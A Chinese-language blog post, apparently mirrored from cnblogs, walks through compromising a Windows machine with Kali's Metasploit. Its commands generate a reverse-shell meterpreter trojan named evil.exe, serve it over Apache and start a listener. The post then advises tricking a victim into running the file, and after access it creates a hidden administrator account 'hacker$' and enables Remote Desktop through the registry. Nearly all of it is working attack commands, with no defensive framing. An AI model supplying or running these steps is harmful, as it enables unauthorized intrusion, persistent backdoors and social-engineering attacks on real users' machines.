zoukankan      html  css  js  c++  java
  • 2019.9.20使用kali中的metasploi获取windows 的权限

    1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3bractrack

    其中Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsolemsf依赖与postgresql数据库,在使用msf之前要开启该数据库

    step1:生成木马,msfvenom

    msfvenom -p windows/meterpreter/reverse_tcp lhost=kailip lport=5555 -f exe > /root/Desktop/evil.exe

    -p 参数后跟上payload,攻击成功后后续要做什么事情。

    lhost 后跟监听的ip

    lport 后跟监听的端口

    -f 后跟要生成后门文件

    step2:将木马文件evilshell.exe 拷贝到/var/www/html,开启apache

    step*3:提前查看postgresql运行状态/etc/init.d/postgresql status

    打开postgresql数据库/etc/init.d/postgresql start

    step3:开启msfmsfconsle

     =[ metasploit v5.0.41-dev                     ]

    + -- --=[ 1914 exploits - 1074 auxiliary - 330 post       ] 

    + -- --=[ 556 payloads - 45 encoders - 10 nops         ]

    + -- --=[ 4 evasion                                ]

    exploits :开发利用,用来攻击某些服务,平台,系统等用到的工具。

    payloads:载荷载体,攻击成功后要操作什么。

    msf>use exploit/multi/handler

    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

    msf exploit(multi/handler) > show options

    msf exploit(multi/handler) > set lhost 192.168.106.128

    msf exploit(multi/handler) > set lport 5555

    msf exploit(multi/handler) >run  或者 exploit

    step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kali中就会得到肉鸡的shellmeterpreter

    meterpreter >shell 进入肉鸡shell

    ipconfig

    net user hacker$ z7m-sl7d2 /add

    net localgroup administrators hacker$ /add

    net user hacker$ 查看是创建成功

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 打开远程终端端口

    kali打开新的终端

    rdesktop 192.168.106.129

  • 相关阅读:
    解决PLSQL Developer中文横着显示的问题
    品优购_day06
    品优购_day05
    品优购_day04
    品优购_day03
    品优购_day02
    java 学习中遇到的问题(二)泛型中<? extends T>和<? super T>的区别
    java 学习中遇到的问题(一)方法调用中的值传递和引用传递
    java中的字符串比较
    自学java 第十一章持有对象
  • 原文地址:https://www.cnblogs.com/shuihanhhhh/p/11575657.html
Copyright © 2011-2022 走看看